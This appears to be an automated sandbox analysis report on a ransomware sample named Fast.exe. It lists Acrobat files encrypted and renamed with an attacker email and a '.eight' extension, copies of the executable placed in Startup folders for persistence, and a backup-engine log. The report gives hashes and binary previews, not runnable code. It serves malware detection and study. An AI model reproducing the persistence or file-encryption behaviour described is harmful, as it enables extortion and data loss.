    Preview:.."...Sl...@!u7..m.I.x.V...........-...t.G...........Big.......4[..@t.DR(n.$3..C.x.....i*G.....!...`$./.[.d....P......ki..3..Q.M.bb.~.3..)L.9J...a ,<..G.!...sN........e<.,....pg.+.x......X....<^,.}...5.g.........T..).=.....<.4..Z._. ...<../.............3.*.T...rX..x.........+*..b.e...\...-....[...~.......B..W......._iF.....[..@/.j...y....h.O....4....a...y..?}-...$.&.L..g.i....@.d...o%....n..."./.......$t.`~.Q,d..L.9....S...ng..3U.5...........r.g....+.?.s.6..,....9.6.P...=.....p=o.M...nb.a...`h..Dh....).I..B.M5...;...cz.$..........)^.|.M..6....g....S..CpZ]..I...H.............3&.,...4.....O....|.....L0(L..i.)#...J..4.e.c........^.(..\..=)...(QaJ.0.....h4.BV^...P.3|...yL5.4...h&l.T.|....;..L.{(.;.#...,.W..nf...8b....K.Z.H#/.j...HT..}...H.UT..}VL$8...&..H!.Z..<.......w....|..&X...}......y...6.Z.F....I......r..2.z@4.....Gx.!.f1.....tj\....V.d.\H.....m.?&1........g]..>....s...DZY....!.:....\;.Y....M./...}q.l\.. ...1...Q...4...V.0.x

    C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\chrome_200_percent.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):918770
    Entropy (8bit):7.9997950005877305
    Encrypted:true
    SSDEEP:24576:xaWt5dvOQhMiETLgzAHFfMDfMTkfLKvle4ud:xvfNOuRAFMKkzKv4t
    MD5:4C1EF90F150B046F5C0393AFA2E7B41E
    SHA1:E3ED5C7C4B940B01C4C9E11ADC3679CD5E951B2D
    SHA-256:1ADFCA1B7654805089C7A1CBFEF629EEDF20F97A52A4BFB34C45C13A8655AB19
    SHA-512:B640DE29C99AEFAABA89FDAB38CA032807F503E553CC2DBA6F2EB0587B301905A976FEC9431E0F17D40BD1CE98DFBEF57F41B2ED6ED0280C4DB2D85381F9685D
    Malicious:true
    Preview:.....6.3v.#...F.......tu#.3...C...E~.e.,v.......gg..-G=.mC....p..KV...1..%...O..y.Nbl..p[Y}..B....j.Tyq6...6n.*)../..(.4...cec9.T..m.f....6.9W...=.!h.x.....S..q.{C..3.%C..^g...]l..!....;.`....>..6Bq.$..q\..|.TIK\.MGe...y.B.kJI....a...m.m......X.afrrV..@.......W.x.J..H..c...g.tB^...^.<....j.y..O2......A..Z....W.kN6.."...!V.)#R......p.\..%.d..-....5.~....+.s..y...q..aS.$..3.S21.k.q)H..'{.C...<<.8%'.(zn.Q..{...R.V.!..i.N..<..;{.G.....|.L.k./....E.(..|.K..*...`8f...M..3......B.o.7.(!..2..,......y.'.......Y...K...,.L..+r.K. C....Jo..A....&tk..5.>q..I..R*.)....!../....l.>[N......,.q...c...s....h.I..QO...o..H.....&&1o\$..Y..y...C.?..........$.zc..s...c...m.u.F."..F...0..Fm....|...c.C..............:.0.!.Q~..9.U.H9........j...._..*......L....3....W..p....S.........g.mr.E.E.T..2N...X..x.%j..... .......p:.;...........v..AmUj.Uz..=....D.......?x..@jA.c9.t.FJ\:..T=.../.oq...........L..J..-lp....Z....l..0d..b.IQ...S..../j..}X...>...mrPt\-"....a`~.V......

    C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\chrome_elf.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):1224402
    Entropy (8bit):7.999862909779432
    Encrypted:true
    SSDEEP:24576:NOzgXa4eNpJKFzzOYH9nvgpHCtdAna78NNO/KvqF14p6VKQMNDd:NOzU9VCYH9nYpH8dyag/AyKu
    MD5:CF922F997AFBEAD03593D2BBCA1CD470
    SHA1:9DBE9DBFF3696B5716E87C86C2B57371FFD00514
    SHA-256:1F340C4F69C922A471E522036961B582C3B0154D287581125F478040F65F65E6
    SHA-512:14AE022749CD29633BC7ED63564735F19EB0802DE830AF93081AB5EA61BD82FA8FEB1514CD6DE652F1149B42A6CF1CA73E010879901631686CD028179589755C
    Malicious:true
    Preview:....8...h.+=%T..^!o>Z..#..S.........U@..@....f.a..z...&.2....d..bE..*S@....f..OV.$....r.....7..g....Z'........Q.(..3..o9.6.-=...9...=...j..W2....o.........j.X..D9fp-....ia,......K.........X.(B..2.U....4m-..\i$...C..I'...m.'.6....yu.. ..;....=D.{.......n.cQ."..N..`.C8......P<.Qs%vd....:...G.....F....j.[......h%..M}.4.>..As.EH.i.r._.....;.....D.M.E........M.I.......\..8..8o..z.]......S.j.NP&o<......\...})..2..[l=..d.....A..^)Sf.#..T(..C..[q.v.;G. ...Qa.O..lz....:I.....j.S....t#...B.Kc..{..fW]V..K..v.d......Q=.....d`.&..`.D....[._$.v...6?...r./^.~...{GF.f.t...WBb.?.&u.q.}...._..............PJH....$.[.J^.pH..B.(]^z8.....&e.j..\..F.&.~.S.~6..2r...K.!........|...s,..O.....`{..KpX?.Y+..F..b...[..f@q.....N..z......Rk..N....1.h.".d..il$.N...iT...lE.U.d..d......C...0l1.-..+u...]y.M6...p.(z..U.fV.R%....BX..R..2M......Z.F.c.s.x..v.....@.Yy..Q.)Pm.0b ..I.\;SO.9a.z.j.a..}..Q-nrq.p.Y.ZA.u.5.i}.W.FC...&..=.Q=!.d..N>..(]..9=.Z..C..x.q...t.M...'6Mc.J~2..T..!

    C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\icudtl.dat.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):11237730
    Entropy (8bit):6.160250363707686
    Encrypted:false
    SSDEEP:196608:RzwSv9AAyNe6liXUxCGZHa93Whlw6ZRnVM:aKlyNTliXUxCGZHa93Whlw6ZRn2
    MD5:68968B94B7DEDD37CF33719BB92F05FD
    SHA1:B30713D8861F80748E06C7293D7A34FC2397D9C5
    SHA-256:3C663F41BAE89FF684F914B8E77D2C7DC5EA5E72F823191D23F72D24FF217DBE
    SHA-512:7EA92227F39F00EEAB4C999F3FBEB41463C7FD1319FC03CED43C4C8F687C2526820F65E4DB81DF2515B5A650F4450F013BF91F8370BCDF2DA3BECB32FF4D8370
    Malicious:false
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\libcef.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):177411282
    Entropy (8bit):6.662609199289216
    Encrypted:false
    SSDEEP:1572864:NqyTOaliwnJRMpKLDZli4ozxIejTz2u9Mlk/jBfg3GH5gVtTck:t2JgVKk
    MD5:73897DE902436737870737B812685AED
    SHA1:7E3A6A1114D3D7DF290604F401E4AF8693A8A7CF
    SHA-256:DEED3963DB7C6BDC59A56FAAEAEC49FB4877DC89713C1E1ED7E656413A72E0A4
    SHA-512:786DF1712FC6BAB79DA838DA55AC096E5A03F71AE188580C15C15F8B9331A5A90695DE3491CAD1D9A728C785AE8596E7937832E4D61D7AD4A8931DDFFD400683
    Malicious:false
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\locales\en-US.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):341202
    Entropy (8bit):7.999517398827045
    Encrypted:true
    SSDEEP:6144:bAVFXvmyIcEQ5VvI/9D+eJz+n3vvxZHkmzlgxZDHNG1xe7SL4X:bq7XO6K+33Am8HNQM7SL4X
    MD5:62F3872CFC67BD62BCBB6B7DAE79C424
    SHA1:70AAE46405356FC6A94C895BCD06B9DED89420A3
    SHA-256:3BB66944E720CB07423D42126056E76FFAE184F2C71EC8E19EAB256D76E5FB3C
    SHA-512:FD3AB35D8BBD444B989741F55A46DA216259CC2ED8E6CCE03C4C0FB54A0ADD855EE1CE4BB846F9BE0E88D4FC85A83B1F5CE858A86FC99605551CDAEE3A38F51E
    Malicious:true
    Preview:.o....H.....A...h?.GLQ..(.bf..u.../E.....Ai&.}..&H..uH..K..3.yon(..D3bweD...U.M.8.G....r.H...NU.|'....^o..,.`.f.....84.H..RJ....I..J...^..D..w....o..5E.=.. 0..Ew..."5|...LS.j....),.q=P..|....`.V..4t1....@....C...XS\~ ....Y.i<x.N!.T^..=.....-......k.c!...N.}...&Txc....uic..:...V.oM.sd..\...}f#.n.Tx.h......w_......e..S...;...1.$..A....S.l z...Mmqj.....(..C.L..+..d...v.e..y...1.B...E..@.."Uv.L...L.`...l.>x.C.m/..9(.@..[.,..[.0.M:.-..}7+..\..`...,.T....y..]..>*....I...l.r...1.`|.P..-~0..-:..Y.p....IZ|.wWd.....w.....P...M8b........Ej,....'.P.....@V...o.....%*V..C....e...b.ua..o.F.hDK.........*..H..ck.P....Q.......^.L#...l+..........EY..~..........F\....a/...D.p........yNL..u.X..rf.....9H3...F...gf.s..:..h~...`......B..6. ....E=...F.p`7..?Vvx@7..@....&`..K.^\..e..@....jm~qYz....f0.....W.^w.X..?l;.d.uh..*......wj...nB$.4X..c.........IE!...K?..8...0.}.DP..N...1S.0H.z.q...X.<. .V...f..*m....9...>.........s.!........-L3^i.....x..?...;...[....izL..

    C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\resources.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):8207566
    Entropy (8bit):7.651165989995995
    Encrypted:false
    SSDEEP:196608:Qi9AF4cC5G0p3m18orDhYVskrDIleMPXW2897:QU64v8w+BOVskrDlMPXCN
    MD5:FF2C703D483E7768C1B187D4DD337B8E
    SHA1:B2C041EA968A34002E259DA9C6B901D23F6412A1
    SHA-256:69E49D5B1DEBA95A0D96C40F0C7B3D57CD5FAA83C633162B9902D798BEDEDFEB
    SHA-512:1B2E97EB5E5238387DB2A6410E76FD12758A5AAC76E56C0436C77B319E8A565257CC0FF69C99F6922690D0AA97786DA5B2BC7C96FF8021D239BC0761BAEF3F8F
    Malicious:false
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\snapshot_blob.bin.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):415394
    Entropy (8bit):7.9995772406046255
    Encrypted:true
    SSDEEP:6144:woeZABPgZtgzVmRNVcYaQaWWi66faEOu6ehm+VMFw2O7hkdrjeSZk8AfPHI70sdb:wbZmeghAKFu6ehEF672t4fO00F5yk
    MD5:1770BAAF3D4351A46C95C7A886F5A5B0
    SHA1:FD04A7B2E1BBA274DB0DB1D85C33E8605E419029
    SHA-256:8D9D7A6FCCA383B9F1E858CAE774CD72DA956E20572C8D003C81BAB4A6893117
    SHA-512:6EFA73B2BBF86391177076B4ABD3CA8D58BA8F00E05616DF47B09544A587066F081269099F14310460638932CAB176D6E47998FD717ECCF1E7DED119876C1DE9
    Malicious:true
    Preview:P..D..2.E.ti....:xG.n...+bY....4..9e\.h...H`...3.....zJ.=.u........:kiHy..*.8z..1]'K..}..Z.W.V4..S...I..W.`....\....%.:A.ao..M.{d....l..A>...S.y.....=...#..I0..%.*..ed.l_,tX7...F........n..53{..T'v..T..-.a..8y...G........Da.5.).4.37.M,j.......>_..B....@.2...6..+;.8b}.].......|z/......:d.S.4......"D''.......Z..7.. .N.8""....5..N+...7=....jx9$....".Q.o.V..[.6;;.....S.IPfGi...2..u.'..{.....1o....rz.....O..+`.c...*.d..L.I..^...ds_..?3...)&.;F.~ua_/&\....%v..A.=....z..;.....f%p ..A....."..aj.g.....&i.>...G@FUBB.lts.....M3.......q...\..%b....6..ILo..+2.J.c.&$:W.O..`......"..@...,.........$....[....6...{Z.Y#...5.Juw..pf.)...(zgR..(:...vR[.......)...({.X......)?..B{~.d....&$.:..:...k....#`.e..X........Sj...f#.......L8... .)...P......p 1.+.gHY....O.%..$..".R...D...'.uL.'VYU.(....fh..Ml.&U.Z!...dK.....p...{.;......&..T7..4r.b(.#.z!.I.k.{.-.....A).Q...#......=.....d...) 5..g.FVBU.{.T.i..[By......$.gU..X...(x....\X..`>..,...S..V?..^...k_?.

    C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\swiftshader\libEGL.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):15106
    Entropy (8bit):7.987626465576231
    Encrypted:false
    SSDEEP:384:uaDK/ygsI6eDJGDfn3isfsXz6pFloOOWB7VzEl6Q:1KEvM4Tn3isfA6RuW9VQl6Q
    MD5:3F6914EDE9FE7E693F8892FD85C30803
    SHA1:143902C07564628A9A98266C1D6B7CD302F4C3B3
    SHA-256:9474FDFF3019274939828444653F9418CCB07A458E2A6715295C8F85D032C9AD
    SHA-512:DB63B5325EDF22A856D061CB0B4F976566CDF66DBA0E028ECB5EE2852604A78916245B44DC7C9BF33A0C17DB17FA1F9B69FEBE217E2526953DC2F2595E51A73A
    Malicious:false
    Preview:5...^..v.......>g.....(1._.`.].3.F...^.G1..B.....f.P@.m.GClD.6.%NT..1H........_3#.1...lk]M...E.3`.....nN......ns&....6..<..!...V6.....dM..../.7.e.w..u.6.......|t.hik.....3. 1..lo[e....^....S ...x.2s.-.....y...Fj..].H[....7.....i.{4m.!../.....".G..:..'.I..J~..mS..U.L...=C.....H;.B....S... $.p.vZ.ZUX........1Z=.M.v..H..SJ.1..m.N.S.\.\}.T....tJ.<.f#.Ta....j4..Wrc.*.c..:...JR....n.#2.....-.x....;...K...6.. T.qL.DF...J}:%....#I.'N. .p,.......>y...4....@B...n#1s.6.h7.z6*]..y.!].V..P...O..y...H...........-.c..K...=.].>B.............9B...f..P.3.'...>...&......@Y..(../....].j...S.d.%......c...)S.U..._BZ.....I.R..y..$i.K......T.H.......qW7f...JG*..:.}v.=..2.7.h.../.1..r........31....s..C....^..n7...y.B...Sm.$.;;.v................:.s....#|...y*.r..W(.. .j.Lt...DF..w)Z..JPy"..U..*....:..:....67%.'.)2...A...xw.uUn<.L.q_)9.PH..#^...(B+.T."..[#...&l0...B.{S..Op.^x....}......]dGn... <..%.Z6......b3.[>....4.x...$x..*."/.$.p........{.,..A

    C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\swiftshader\libGLESv2.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:OpenPGP Public Key
    Category:dropped
    Size (bytes):15106
    Entropy (8bit):7.988143377257791
    Encrypted:false
    SSDEEP:384:daYVXz9B0NwyrfB87jXyhMLL033DjWntnF+pc4sCJbdAsyU7Sd4GaQ:UYBz9mNwMp8HXya03GntnYlsCJbesyU2
    MD5:B6563F9F27A22F66D82AFC1DF6A65749
    SHA1:DB3AC2487EC042A8FB8C89E9AD494D0136A1A66A
    SHA-256:3834F6890BAE5E33D5D5B314511F30B9E4A5AFE24D50F41961917F4190DD1DAE
    SHA-512:554D950814F5E5A5D49378D3F9BE9DC1A6ADF4054EE91E3CE22F1DEE7DC6109B5198B34A4A7D4E50DB5B0BBB56A1FAEA8C88581E81EC99AC7C84D1A8D0DFB096
    Malicious:false
    Preview:......N..`<..A/.......\....._!9.Q.../...........M..p.a..v.....+..UG.\~z.J^....+j......A..1=H`..G.x]...|.M..XXk.d?.D[D.S....r*...1>../.'.......;.8...@..`0Vq....s...g..Nk....aE.R.L../._...=....aI.....E.b,A.-.P....~.7.qg....n....e.c....$.Y.. .8{..~..t.....Q.$e&..K.zA.(.._U..'I..S..y0{..,.F..4x.33,..?i.../i.Z...Jj.w.n.X.X.k...{D...I.".......mw..{....\..N...m.!@...}M.@}..Xl.k`rZg...sV-oj.K.:.8L.0...../.]I3..<.O...jBu....*<EWc*...@.K....K."...;..?.....T$.!.&^.+G.P.P.eRi.p=.....B..C...Ol.rm..p..W..1..7./....~.....4.g.7l....{'.B.W..r.We.~.!..-..f.b..S.x.....I..`T#4.(.....o..\../..D..+.....=m.$..?H.Q4L..!.dM..y.N}.....Ro...4.~...%"^...i.;WdI.*3k..3.uO....]\]P...e_..9.b .-4..^.h.....=5..kD..V...L#`....%...W=...!n...`...7D>..D..?.....4...z.V....$.3...f..:6..H.1..p)yp?.>.=.....V;.J7=..u.....M.'Db.4,.T^c4.d...c.......g_..._MI_.....L.O..]C.....c.....-....0<D..3.{..P7........./.B../..2..S...;.._.oXK..<.C.(........'.K.g=......dP.g(.f.....g(

    C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\v8_context_snapshot.bin.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):723170
    Entropy (8bit):7.999720408407077
    Encrypted:true
    SSDEEP:12288:Ew3E+FuE1rkl9bNyNKVjakSf7zjfqTHsprP7aEHPu+mQzMrqF+:vyXUKpaD73qTMpr+EHmqz8j
    MD5:18F1B72387031A7CBA855664BDC45594
    SHA1:639443B85A791B929403E14D079CF0DA31BE657B
    SHA-256:1FD2CA6CD571E843DB63719352B6DEFF5CA98BF5D22FFE995FD0FB24F6F90F14
    SHA-512:6C6C210A0431A04AC62CA851BE385F0E86E3835F45D82930B3EF3E9EF0EACB6248343C3C5FED1BB8FFD31AE498DD9326A3B8283E87ECFB3A0214BFD069950B6C
    Malicious:true
    Preview:....Q.8'.c.#d....tA....t.]H...e0$Ey.01.e./9.......E....'...>. ...|..5.0.p....gm..hV8...r$...K....T.,Q..." .l....<.{.x..[.Q.S...5[.......7.-.....4x..`..R...._.[.......^....v..P...q...g.I.b]2....v....\...wO.F...UO.6.Qr..1...A..!.+...C..z+.F^......Y.Z......W.i.h...*.n...O[0n ....|'..u...M...../..~.-.Q.3...f.<.f`..\v'e%.z.I..1!C.....b.*.{?`Dw.=KJs..Q.....R..kN.T.......}ax{x...."5.%..F.wi.T..?DF.D..Z.Poc...p.^....I..........U...+U..s...N.}A.-......66a.1.f.C"..c....z...~...i.v.>i...Wg.....l<V...mN.*._..-U..~m.....@....}...s...+..)..3/.%.R%.*.p....[O...d:.#'..|A=j.{.rH....j.f..TI#.....T..9.j.t.:3@|...|'2..2...^.G.~N.:.e..*H.m.s..MW.M...^..nQc..R....rW..y..nI....H.;R....Ia.....6F..;..{...I..8..l..._.kU>..g....u..K....;......?-.?q...9.............N..M..#eG.......~...K./.\.T_..r..-.Z.>'..]..}.s....t..3#r...Q..]..W.H.F..p..M3....t.T?HM....R.}.....u&0,.R..{\/i.M8..&pw.^..+.x....t8.8...e:....B...h... .ERG.<........@.`.h5s..M.)h..med.uX.f.E..

    C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\vk_swiftshader.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):4989666
    Entropy (8bit):5.951265195823128
    Encrypted:false
    SSDEEP:49152:pZhlPMtYgEMf0i8P/O3O6SQkknVI2EHuhv5UqHI1mbzF7+uMvtcgky7Rrn+Qqt01:jPU7aHA/M8y7RozUUHLf1oYe
    MD5:1E3A79C584F59BA2449A6ECB01864365
    SHA1:2C17842CE6EA74B78B1A755A6EB30FEF0F8387FC
    SHA-256:54A10C93040966AE963FF82BFBC6191C8DED13EBF9CD1CE84FB8F74667E29518
    SHA-512:3DBADFD7B134F46802829056D58544E7A266A35EF3781021037DBA12788708C2E37C00AD0D19219F25D1C0A7A2E7CD29E70F8DCAB3A16D04FE96D70F239EBFF6
    Malicious:false
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Fast.exe

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
    Category:dropped
    Size (bytes):56832
    Entropy (8bit):7.07249253388244
    Encrypted:false
    SSDEEP:1536:ENeRBl5PT/rx1mzwRMSTdLpJVIVAxN/0nVS12:EQRrmzwR5JiWxNIJ
    MD5:EA6D3083F8C1C506FBFF457BF09A7ED8
    SHA1:F159C4FC7D13571E725F0AE9E0749C77CF859B4E
    SHA-256:000DB71531E5AA8B30594D305BB3FBCE8E2C71F66E2170091EF58B3C1F306F46
    SHA-512:1167B9EBE03C399C5915394592F97CE60BD07E92F589A4A0D794255C7A9C46423DD28EFBF96B45AAB6A67763A20676627F35683CC6790BF1383C7F07B6E28405
    Malicious:true
    Antivirus:
    • Antivirus: ReversingLabs, Detection: 89%
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n...*..A*..A*..A#.TA+..A#.DA9..A*..AE..A1GIA+..A1G}A+..A1GyA8..A1GJA+..ARich*..A................PE..L....P.^.....................>......./............@..........................0............@.................................4........................................................................................................................text............................... ..`.rdata..|...........................@..@.data....&..........................@....reloc..............................@..B.cdata...7.......8..................@...........................................................................................................................................................................................................................................................................................................................................

    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Fast.exe:Zone.Identifier

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):26
    Entropy (8bit):3.95006375643621
    Encrypted:false
    SSDEEP:3:ggPYV:rPYV
    MD5:187F488E27DB4AF347237FE461A079AD
    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
    Malicious:false
    Preview:[ZoneTransfer]....ZoneId=0

    C:\Users\user\AppData\Local\Fast.exe

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
    Category:dropped
    Size (bytes):56832
    Entropy (8bit):7.07249253388244
    Encrypted:false
    SSDEEP:1536:ENeRBl5PT/rx1mzwRMSTdLpJVIVAxN/0nVS12:EQRrmzwR5JiWxNIJ
    MD5:EA6D3083F8C1C506FBFF457BF09A7ED8
    SHA1:F159C4FC7D13571E725F0AE9E0749C77CF859B4E
    SHA-256:000DB71531E5AA8B30594D305BB3FBCE8E2C71F66E2170091EF58B3C1F306F46
    SHA-512:1167B9EBE03C399C5915394592F97CE60BD07E92F589A4A0D794255C7A9C46423DD28EFBF96B45AAB6A67763A20676627F35683CC6790BF1383C7F07B6E28405
    Malicious:true
    Antivirus:
    • Antivirus: ReversingLabs, Detection: 89%
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n...*..A*..A*..A#.TA+..A#.DA9..A*..AE..A1GIA+..A1G}A+..A1GyA8..A1GJA+..ARich*..A................PE..L....P.^.....................>......./............@..........................0............@.................................4........................................................................................................................text............................... ..`.rdata..|...........................@..@.data....&..........................@....reloc..............................@..B.cdata...7.......8..................@...........................................................................................................................................................................................................................................................................................................................................

    C:\Users\user\AppData\Local\Fast.exe:Zone.Identifier

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):26
    Entropy (8bit):3.95006375643621
    Encrypted:false
    SSDEEP:3:ggPYV:rPYV
    MD5:187F488E27DB4AF347237FE461A079AD
    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
    Malicious:false
    Preview:[ZoneTransfer]....ZoneId=0

    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exe

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
    Category:dropped
    Size (bytes):56832
    Entropy (8bit):7.07249253388244
    Encrypted:false
    SSDEEP:1536:ENeRBl5PT/rx1mzwRMSTdLpJVIVAxN/0nVS12:EQRrmzwR5JiWxNIJ
    MD5:EA6D3083F8C1C506FBFF457BF09A7ED8
    SHA1:F159C4FC7D13571E725F0AE9E0749C77CF859B4E
    SHA-256:000DB71531E5AA8B30594D305BB3FBCE8E2C71F66E2170091EF58B3C1F306F46
    SHA-512:1167B9EBE03C399C5915394592F97CE60BD07E92F589A4A0D794255C7A9C46423DD28EFBF96B45AAB6A67763A20676627F35683CC6790BF1383C7F07B6E28405
    Malicious:true
    Antivirus:
    • Antivirus: ReversingLabs, Detection: 89%
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n...*..A*..A*..A#.TA+..A#.DA9..A*..AE..A1GIA+..A1G}A+..A1GyA8..A1GJA+..ARich*..A................PE..L....P.^.....................>......./............@..........................0............@.................................4........................................................................................................................text............................... ..`.rdata..|...........................@..@.data....&..........................@....reloc..............................@..B.cdata...7.......8..................@...........................................................................................................................................................................................................................................................................................................................................

    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exe:Zone.Identifier

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:ASCII text, with CRLF line terminators
    Category:modified
    Size (bytes):26
    Entropy (8bit):3.95006375643621
    Encrypted:false
    SSDEEP:3:ggPYV:rPYV
    MD5:187F488E27DB4AF347237FE461A079AD
    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
    Malicious:false
    Preview:[ZoneTransfer]....ZoneId=0

    C:\Windows\Logs\WindowsBackup\WBEngine.0.etl

    Download File
    Process:C:\Windows\System32\wbadmin.exe
    File Type:dBase III DBT, version number 0, next free block index 10240, 1st item "\374'\201\202"
    Category:dropped
    Size (bytes):30720
    Entropy (8bit):1.7838103642799872
    Encrypted:false
    SSDEEP:96:z/mMWnTSHuPt2azvAdeaEdsb/8pRbWb5FTOzNZJJd5:5WTIuPt2azvAgVu7OxZJJd5
    MD5:1B79EC8F44B9BE6458C7AC0DC6F69B17
    SHA1:6A70985915CF83974C8984969881D087B0F40BF4
    SHA-256:5FFBA9F9B70FFAC7CED3E205A6D90DE347BB9C8DCC9F2344633A367C12B0829C
    SHA-512:6E50000B1E67E336836F09C322F43318850A3661FE8149A23A54E030A82C9325322E7979EC23D03E5B7E07827335F6EE36903F228EDF271F47E2CCCEE731FE8C
    Malicious:false
    Preview:.(..@...@...........................................!...........................`........'...............(......eJ...........Y..Zb..................................................@.t.z.r.e.s...d.l.l.,.-.3.2.2.......................................................@.t.z.r.e.s...d.l.l.,.-.3.2.1..............................................................O............nD!..Y..........W.B.E.n.g.i.n.e...C.:.\.W.i.n.d.o.w.s.\.L.o.g.s.\.W.i.n.d.o.w.s.B.a.c.k.u.p.\.W.B.E.n.g.i.n.e...0...e.t.l...........P.P.`........'..................................................................8.B..'......19041.1.amd64fre.vb_release.191206-1406.....-.@..'......I:...S%9.`...'.R....uudf.pdb........0.@..'........B..,`..9..4.....ifsutil.pdb.....1.@..'.............1$OI"......wbengine.pdb............,.@..'.................'"a.-....spp.pdb...........@..'.......T.c..i.\.C.s"8@....vssvc.pdb......./.@..'......W.p.D.......]....vssapi.pdb......-.@..'.......\..Q....T*&.......udfs.pdb........0.@..'.......2.R.+..

    Static File Info

    General

    File type:PE32 executable (GUI) Intel 80386, for MS Windows
    Entropy (8bit):7.07249253388244
    TrID:
    • Win32 Executable (generic) a (10002005/4) 99.96%
    • Generic Win/DOS Executable (2004/3) 0.02%
    • DOS Executable Generic (2002/1) 0.02%
    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
    File name:Fast.exe
    File size:56'832 bytes
    MD5:ea6d3083f8c1c506fbff457bf09a7ed8
    SHA1:f159c4fc7d13571e725f0ae9e0749c77cf859b4e
    SHA256:000db71531e5aa8b30594d305bb3fbce8e2c71f66e2170091ef58b3c1f306f46
    SHA512:1167b9ebe03c399c5915394592f97ce60bd07e92f589a4a0d794255c7a9c46423dd28efbf96b45aab6a67763a20676627f35683cc6790bf1383c7f07b6e28405
    SSDEEP:1536:ENeRBl5PT/rx1mzwRMSTdLpJVIVAxN/0nVS12:EQRrmzwR5JiWxNIJ
    TLSH:B643AF06706A40B2CDB18570293A6F5F8FBF910144B498478F294EDA3FD5572E72A3BA
